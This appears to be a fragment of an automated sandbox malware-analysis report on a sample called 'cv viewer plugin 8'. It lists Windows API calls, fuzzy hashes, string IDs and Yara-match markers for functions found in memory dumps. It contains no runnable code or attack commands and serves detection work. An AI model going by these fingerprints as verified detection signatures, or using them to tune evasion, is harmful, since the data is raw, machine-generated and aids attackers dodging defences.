                                                    • Opcode Fuzzy Hash: 29492d0f99114663b1cc24eab4c5176bb6a2289f54992e8045a145b75a4aca54
                                                    • Instruction Fuzzy Hash: F6F0B43294071A6AAA22A91E5CC09EB72DDDB509A0B01052EED47D7707EF62DC81439D
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,00000001), ref: 016A2350
                                                    • InterlockedExchange.KERNEL32(?,00000001), ref: 016A2360
                                                    • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 016A2370
                                                    • GetLastError.KERNEL32 ref: 016A237A
                                                      • Part of subcall function 016A1712: __EH_prolog.LIBCMT ref: 016A1717
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                    • String ID: pqcs
                                                    • API String ID: 1619523792-2559862021
                                                    • Opcode ID: ff012f5cc59265586831c02570117ee739955ba578448cdb4abff3ac9e2252a5
                                                    • Instruction ID: 2859582a737048ef8a0ef5636ae8fed6796ca662e81b5d322e7469fd5b12324e
                                                    • Opcode Fuzzy Hash: ff012f5cc59265586831c02570117ee739955ba578448cdb4abff3ac9e2252a5
                                                    • Instruction Fuzzy Hash: 59F03AB4A40305AFDB20AFB89C29ABB7BACEB11601F40456DE805D3140EBB1D924CFA1
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 016A4035
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 016A4042
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 016A4049
                                                    • std::exception::exception.LIBCMT ref: 016A4063
                                                      • Part of subcall function 016AA6CA: __EH_prolog.LIBCMT ref: 016AA6CF
                                                      • Part of subcall function 016AA6CA: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 016AA6DE
                                                      • Part of subcall function 016AA6CA: __CxxThrowException@8.LIBCMT ref: 016AA6FD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                    • String ID: bad allocation
                                                    • API String ID: 3112922283-2104205924
                                                    • Opcode ID: 71d9e0fa3ff2fe0f1cd0c51b9cb2f4f954b7b44a370b5165906ee022e95e89fa
                                                    • Instruction ID: 4812b9dbbf26b07b79432626d85015500134a79a6e0ab56d1838be5fd7cdda1a
                                                    • Opcode Fuzzy Hash: 71d9e0fa3ff2fe0f1cd0c51b9cb2f4f954b7b44a370b5165906ee022e95e89fa
                                                    • Instruction Fuzzy Hash: EDF058B1E0420AABCB10EFE4CC18BFFB779EB18A00F40455DE929A2240DB786614CF55
                                                    APIs
                                                    • GetStartupInfoA.KERNEL32(?), ref: 00403D2D
                                                    • GetFileType.KERNEL32(00000800), ref: 00403DD3
                                                    • GetStdHandle.KERNEL32(-000000F6), ref: 00403E2C
                                                    • GetFileType.KERNEL32(00000000), ref: 00403E3A
                                                    • SetHandleCount.KERNEL32 ref: 00403E71
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: FileHandleType$CountInfoStartup
                                                    • String ID:
                                                    • API String ID: 1710529072-0
                                                    • Opcode ID: dbaca84f47ceea487b5a59e7f7eb21175bc7ba2e308e601fb33fec27d5f53662
                                                    • Instruction ID: 0b7b95883a4e689196e32d1b42849a04f4efe08137134e81777c7f486c9ce5ca
                                                    • Opcode Fuzzy Hash: dbaca84f47ceea487b5a59e7f7eb21175bc7ba2e308e601fb33fec27d5f53662
                                                    • Instruction Fuzzy Hash: 025125716046458BD7218F38CE847667FA8AF11722F15437AE4A2FB3E0C7389A45CB8D
                                                    APIs
                                                      • Part of subcall function 016B1A50: CloseHandle.KERNEL32(00000000,DA1F4857), ref: 016B1AA1
                                                      • Part of subcall function 016B1A50: WaitForSingleObject.KERNEL32(?,000000FF,DA1F4857,?,?,?,?,DA1F4857,016B1A23,DA1F4857), ref: 016B1AB8
                                                    • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 016B1D1E
                                                    • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 016B1D3E
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 016B1D77
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 016B1DCB
                                                    • SetEvent.KERNEL32(?), ref: 016B1DD2
                                                      • Part of subcall function 016A418C: CloseHandle.KERNEL32(00000000,?,016B1D05), ref: 016A41B0
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                    • String ID:
                                                    • API String ID: 4166353394-0
                                                    • Opcode ID: 15a7169b1770e321d6a00f5cde5525c4e1d5e6e28bb2811b8dbe71d96de273e1
                                                    • Instruction ID: 4da4fe2afd059737e80b3c5f1bc221e9116031b659b2e1c21e041b53d0d3bb0f
                                                    • Opcode Fuzzy Hash: 15a7169b1770e321d6a00f5cde5525c4e1d5e6e28bb2811b8dbe71d96de273e1
                                                    • Instruction Fuzzy Hash: F141E372640301AFDB26AF2DECD07A77BA4EF46620F140668EC18DB395D734D8418F95
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,00000001), ref: 016A20AC
                                                    • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 016A20CD
                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 016A20D8
                                                    • InterlockedDecrement.KERNEL32(?), ref: 016A213E
                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 016A21A6
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Interlocked$Exchange$DecrementTimerWaitable
                                                    • String ID:
                                                    • API String ID: 1611172436-0
                                                    • Opcode ID: b7fd85da86a19a5925101e4066267e3aee329ceff2ee2392470ee90d09e9dfb6
                                                    • Instruction ID: 2cdfdda21b55c71b3c9ae76108c28e1f8710d3a41bd54e238d439538dd0b8ff3
                                                    • Opcode Fuzzy Hash: b7fd85da86a19a5925101e4066267e3aee329ceff2ee2392470ee90d09e9dfb6
                                                    • Instruction Fuzzy Hash: CA3158752447019FC321DF29CC85A6BBBF9FBD8660F440A1EA59683250D730E906CF91
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 016AE0FD
                                                      • Part of subcall function 016A1A01: TlsGetValue.KERNEL32 ref: 016A1A0A
                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 016AE17C
                                                    • RtlEnterCriticalSection.NTDLL(?), ref: 016AE198
                                                    • InterlockedIncrement.KERNEL32(016D5190), ref: 016AE1BD
                                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 016AE1D2
                                                      • Part of subcall function 016A27F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 016A284E
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                    • String ID:
                                                    • API String ID: 1578506061-0
                                                    • Opcode ID: f1fb6d89d0e90fe953170eb3c271bfeb7b9cbc363055cd98952eb40d0fe76ec7
                                                    • Instruction ID: 1596cb231125d6fe69db740ffb3997df191a1a6c9a21761bd7f4954d36a0b247
                                                    • Opcode Fuzzy Hash: f1fb6d89d0e90fe953170eb3c271bfeb7b9cbc363055cd98952eb40d0fe76ec7
                                                    • Instruction Fuzzy Hash: 353137B1A013159FCB20DFA8C944AAEBBF9FF18310F54855EE849D7640E735AA04CFA4
                                                    APIs
                                                    • _malloc.LIBCMT ref: 016C03B0
                                                      • Part of subcall function 016B2FAC: __FF_MSGBANNER.LIBCMT ref: 016B2FC3
                                                      • Part of subcall function 016B2FAC: __NMSG_WRITE.LIBCMT ref: 016B2FCA
                                                      • Part of subcall function 016B2FAC: RtlAllocateHeap.NTDLL(00AA0000,00000000,00000001), ref: 016B2FEF
                                                    • _free.LIBCMT ref: 016C03C3
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap_free_malloc
                                                    • String ID:
                                                    • API String ID: 1020059152-0
                                                    • Opcode ID: 73cbc82b4f2b4d646a183c03e8843be342f3f255176812e91bcea7bd5a269c62
                                                    • Instruction ID: 60c9a2e47ca6e5e39dd3f2120a2755a355bebd20f357383418ed427fa9f33202
                                                    • Opcode Fuzzy Hash: 73cbc82b4f2b4d646a183c03e8843be342f3f255176812e91bcea7bd5a269c62
                                                    • Instruction Fuzzy Hash: 2A11E736505617EBDF312F78AC446FB7799DB24A60F00C12DFA1A97250DB30C491CB98
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 016A21DA
                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 016A21ED
                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 016A2224
                                                    • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 016A2237
                                                    • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 016A2261
                                                      • Part of subcall function 016A2341: InterlockedExchange.KERNEL32(?,00000001), ref: 016A2350
                                                      • Part of subcall function 016A2341: InterlockedExchange.KERNEL32(?,00000001), ref: 016A2360
                                                      • Part of subcall function 016A2341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 016A2370
                                                      • Part of subcall function 016A2341: GetLastError.KERNEL32 ref: 016A237A
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                    • String ID:
                                                    • API String ID: 1856819132-0
                                                    • Opcode ID: 575cc0268a4e415edce0e078a5c0f54c78b858d893a1a35fab7e0cd0e006cdc8
                                                    • Instruction ID: fd8235b341e8f26787636f208648fac967ac73f6ddb9d22fedad838c3f5338ce
                                                    • Opcode Fuzzy Hash: 575cc0268a4e415edce0e078a5c0f54c78b858d893a1a35fab7e0cd0e006cdc8
                                                    • Instruction Fuzzy Hash: FC118171E40119EFCB219FA8DC146BEBFBAFF54310F40812EE81692250D7718A51CF95
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 016A229D
                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 016A22B0
                                                    • TlsGetValue.KERNEL32 ref: 016A22E7
                                                    • TlsSetValue.KERNEL32(?), ref: 016A2300
                                                    • TlsSetValue.KERNEL32(?,?,?), ref: 016A231C
                                                      • Part of subcall function 016A2341: InterlockedExchange.KERNEL32(?,00000001), ref: 016A2350
                                                      • Part of subcall function 016A2341: InterlockedExchange.KERNEL32(?,00000001), ref: 016A2360
                                                      • Part of subcall function 016A2341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 016A2370
                                                      • Part of subcall function 016A2341: GetLastError.KERNEL32 ref: 016A237A
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                    • String ID:
                                                    • API String ID: 1856819132-0
                                                    • Opcode ID: 35e95444eff630fc179f9b47aadb43620ad59bc899eddaab811c2f468913e732
                                                    • Instruction ID: 0bc33f279dbb78f2b249bbe688cc8ef1c03337abcebab0e45c04e2728c610236
                                                    • Opcode Fuzzy Hash: 35e95444eff630fc179f9b47aadb43620ad59bc899eddaab811c2f468913e732
                                                    • Instruction Fuzzy Hash: 76115EB1E00119ABCB119FA9DC445BEBFBAFF54310F40406EE805A3250D7719951CF94
                                                    APIs
                                                      • Part of subcall function 016AB165: __EH_prolog.LIBCMT ref: 016AB16A
                                                    • __CxxThrowException@8.LIBCMT ref: 016ABD2F
                                                      • Part of subcall function 016B455A: RaiseException.KERNEL32(?,?,016AFB5F,?,?,?,?,?,?,?,016AFB5F,?,016D0FA8,?), ref: 016B45AF
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,016D1DC4,?,00000001), ref: 016ABD45
                                                    • InterlockedExchange.KERNEL32(?,00000001), ref: 016ABD58
                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,016D1DC4,?,00000001), ref: 016ABD68
                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 016ABD76
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                    • String ID:
                                                    • API String ID: 2725315915-0
                                                    • Opcode ID: b9b81be8412211b89efaeb17e35e13de658876fe47bff7381a8f13f31b2cbb98
                                                    • Instruction ID: 5b0b2890f04b1d0e2f45ab91a40462f50a44a12096bcf1f22e31f58d22926d1a
                                                    • Opcode Fuzzy Hash: b9b81be8412211b89efaeb17e35e13de658876fe47bff7381a8f13f31b2cbb98
                                                    • Instruction Fuzzy Hash: 2E01AFB7600305AFDB20AFA4DC89F9A77ADEB08725F004519F626D7290DBA0EC14CF60
                                                    APIs
                                                    • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 016A2432
                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 016A2445
                                                    • RtlEnterCriticalSection.NTDLL(?), ref: 016A2454
                                                    • InterlockedExchange.KERNEL32(?,00000001), ref: 016A2469
                                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 016A2470
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                    • String ID:
                                                    • API String ID: 747265849-0
                                                    • Opcode ID: 262f0cd5ccc1a9d5e73d41dffccd4c48ba489742f5d3722cce921d5bf913f2ed
                                                    • Instruction ID: 740258a823684e49a31de297735049b6c36358dc7d892b35fb8164254a7f9b71
                                                    • Opcode Fuzzy Hash: 262f0cd5ccc1a9d5e73d41dffccd4c48ba489742f5d3722cce921d5bf913f2ed
                                                    • Instruction Fuzzy Hash: C6F03AB6341205BFD720ABA4ED89FEA772CFB44711F805026F701D6485D761B920CFA5
                                                    APIs
                                                    • InterlockedIncrement.KERNEL32(?), ref: 016A1ED2
                                                    • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 016A1EEA
                                                    • RtlEnterCriticalSection.NTDLL(?), ref: 016A1EF9
                                                    • InterlockedExchange.KERNEL32(?,00000001), ref: 016A1F0E
                                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 016A1F15
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                    • String ID:
                                                    • API String ID: 830998967-0
                                                    • Opcode ID: 7a18627189a451e07b330115b2cce2480735fabe1526bcd2a82660df19f9e918
                                                    • Instruction ID: 01af1624cd05fa5549b699fef488a440da6790b427aa36f4a5ac64206a4ad0ec
                                                    • Opcode Fuzzy Hash: 7a18627189a451e07b330115b2cce2480735fabe1526bcd2a82660df19f9e918
                                                    • Instruction Fuzzy Hash: F5F062BA200605BFDB10AFA4EC88FEABB2CFF14345F000026F30182444CB61AA24CFA0
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: invalid string position$string too long
                                                    • API String ID: 4104443479-4289949731
                                                    • Opcode ID: 972804acbf847f77e8925b81d082015fe330e94ddbc953fbd42fdebc6a59df18
                                                    • Instruction ID: 48dd84893f728cfe85aa0e27cc5494f8c0aafcd668d1e1472d649c966699afae
                                                    • Opcode Fuzzy Hash: 972804acbf847f77e8925b81d082015fe330e94ddbc953fbd42fdebc6a59df18
                                                    • Instruction Fuzzy Hash: 7D41E2317003049BD7289E6DDC80A6ABFAEEF51761B94092DE95687381CB70EC05CFA5
                                                    APIs
                                                    • WSASetLastError.WS2_32(00000000), ref: 016A30C3
                                                    • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 016A3102
                                                    • _memcmp.LIBCMT ref: 016A3141
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressErrorLastString_memcmp
                                                    • String ID: 255.255.255.255
                                                    • API String ID: 1618111833-2422070025
                                                    • Opcode ID: a63eb9bf90b4f7cdc48644d77717f28de033a67602ae08673f276e283b61e020
                                                    • Instruction ID: 578667989d145b8019ab3fc63ac48c1cf9ad177507c763ebc82becc8478acc7e
                                                    • Opcode Fuzzy Hash: a63eb9bf90b4f7cdc48644d77717f28de033a67602ae08673f276e283b61e020
                                                    • Instruction Fuzzy Hash: 2031B071A003199FDB219F68CC807AEBBB6BF45325F50452DE9559B380D772AD41CF90
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 016A1F5B
                                                    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 016A1FC5
                                                    • GetLastError.KERNEL32(?,00000000), ref: 016A1FD2
                                                      • Part of subcall function 016A1712: __EH_prolog.LIBCMT ref: 016A1717
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: H_prolog$CompletionCreateErrorLastPort
                                                    • String ID: iocp
                                                    • API String ID: 998023749-976528080
                                                    • Opcode ID: 693c67760203c848f637d34de57effacd9445f1537286059a26c8825e7b1289f
                                                    • Instruction ID: 29d7c13b29b8680d4959e77ce00839ecb9dc6282b27ce81a36b9bc275f7d175e
                                                    • Opcode Fuzzy Hash: 693c67760203c848f637d34de57effacd9445f1537286059a26c8825e7b1289f
                                                    • Instruction Fuzzy Hash: 4821C8B1901B459FC720DF6AC94456BFBF8FFA5710B108A1FE4A683A50D7B0A604CF95
                                                    APIs
                                                    • _malloc.LIBCMT ref: 016B3B64
                                                      • Part of subcall function 016B2FAC: __FF_MSGBANNER.LIBCMT ref: 016B2FC3
                                                      • Part of subcall function 016B2FAC: __NMSG_WRITE.LIBCMT ref: 016B2FCA
                                                      • Part of subcall function 016B2FAC: RtlAllocateHeap.NTDLL(00AA0000,00000000,00000001), ref: 016B2FEF
                                                    • std::exception::exception.LIBCMT ref: 016B3B82
                                                    • __CxxThrowException@8.LIBCMT ref: 016B3B97
                                                      • Part of subcall function 016B455A: RaiseException.KERNEL32(?,?,016AFB5F,?,?,?,?,?,?,?,016AFB5F,?,016D0FA8,?), ref: 016B45AF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                    • String ID: bad allocation
                                                    • API String ID: 3074076210-2104205924
                                                    • Opcode ID: caa503b89e438d7a603ba9e4f49ad1f1788a1ca3c6033d941aff2c0a8b9afe65
                                                    • Instruction ID: 0d3bfc69d5c62d8640c7205c28e2f01816b9519599ab87363dcaa363809117e7
                                                    • Opcode Fuzzy Hash: caa503b89e438d7a603ba9e4f49ad1f1788a1ca3c6033d941aff2c0a8b9afe65
                                                    • Instruction Fuzzy Hash: 5CE0A03090020AA6DF04EE68CC919EFBBBDAB20200F00445EA91466690DB309A84C794
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 016A37B6
                                                    • __localtime64.LIBCMT ref: 016A37C1
                                                      • Part of subcall function 016B2600: __gmtime64_s.LIBCMT ref: 016B2613
                                                    • std::exception::exception.LIBCMT ref: 016A37D9
                                                      • Part of subcall function 016B24D3: std::exception::_Copy_str.LIBCMT ref: 016B24EC
                                                      • Part of subcall function 016AA528: __EH_prolog.LIBCMT ref: 016AA52D
                                                      • Part of subcall function 016AA528: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 016AA53C
                                                      • Part of subcall function 016AA528: __CxxThrowException@8.LIBCMT ref: 016AA55B
                                                    Strings
                                                    • could not convert calendar time to UTC time, xrefs: 016A37CE
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                    • String ID: could not convert calendar time to UTC time
                                                    • API String ID: 1963798777-2088861013
                                                    • Opcode ID: 7ae75b233234b5d19f00da243e00ba2899c5d301351ed25508bf21ec52277476
                                                    • Instruction ID: 9fde07d2429d10dcad7e1f11c8178e9356dff8aa14b606c281d2682c2fa6bff2
                                                    • Opcode Fuzzy Hash: 7ae75b233234b5d19f00da243e00ba2899c5d301351ed25508bf21ec52277476
                                                    • Instruction Fuzzy Hash: 19E06DB1D0020A9BCB04EFE4DC546FFBBB9FF14604F40459DD815A2640EB38AA19CF88
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(KERNEL32,00402E6A), ref: 0040315F
                                                    • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040316F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: IsProcessorFeaturePresent$KERNEL32
                                                    • API String ID: 1646373207-3105848591
                                                    • Opcode ID: ee4fb49231880130fc7adb82ded6e302562b2849836945389797dfa68bab57f4
                                                    • Instruction ID: 396ae008ee37b43aaac66eedf252cb0d6854bca9fd0baad0eaa83bc1c4717f20
                                                    • Opcode Fuzzy Hash: ee4fb49231880130fc7adb82ded6e302562b2849836945389797dfa68bab57f4
                                                    • Instruction Fuzzy Hash: 14C01270380B00A6EA201FB20F0AB2628AC1B48B03F1800BEA289F81C0CE7CC600843D
                                                    APIs
                                                    • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,0040403A), ref: 00404C3D
                                                    • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,0040403A), ref: 00404C61
                                                    • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,0040403A), ref: 00404C7B
                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,0040403A), ref: 00404D3C
                                                    • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,0040403A), ref: 00404D53
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual$FreeHeap
                                                    • String ID:
                                                    • API String ID: 714016831-0
                                                    • Opcode ID: 5cad5202a8731f25dba6dd4aaf0d633060e84280589fe69eb585605416c69a03
                                                    • Instruction ID: 583ec5426b209604bff2a02b3d2478297b9ba55a468d27544d52312baf66a8bd
                                                    • Opcode Fuzzy Hash: 5cad5202a8731f25dba6dd4aaf0d633060e84280589fe69eb585605416c69a03
                                                    • Instruction Fuzzy Hash: BC31E2B15417019BE3348F24EE44B22B7A0EBC8754F11863AE665B73E1EB78A844CB5C
                                                    APIs
                                                    • VirtualFree.KERNEL32(?,00008000,00004000,76F8DFF0,?,00000000), ref: 00404696
                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004046F1
                                                    • HeapFree.KERNEL32(00000000,?), ref: 00404703
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: Free$Virtual$Heap
                                                    • String ID: 4/@
                                                    • API String ID: 2016334554-3101945251
                                                    • Opcode ID: 3ffb46cc47d32c3f8fdb2cc0b40f733643667e7721e671ee35378e11fae462b1
                                                    • Instruction ID: 876bcf6037267374920b0e9be09a40bf20dde446c7cba65ee9efa19dd1b870bf
                                                    • Opcode Fuzzy Hash: 3ffb46cc47d32c3f8fdb2cc0b40f733643667e7721e671ee35378e11fae462b1
                                                    • Instruction Fuzzy Hash: 4AB18EB4A01205DFDB14CF44CAD0A69BBA1FB88314F25C1AEDA596F3A2D735ED41CB84
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AdjustPointer_memmove
                                                    • String ID:
                                                    • API String ID: 1721217611-0
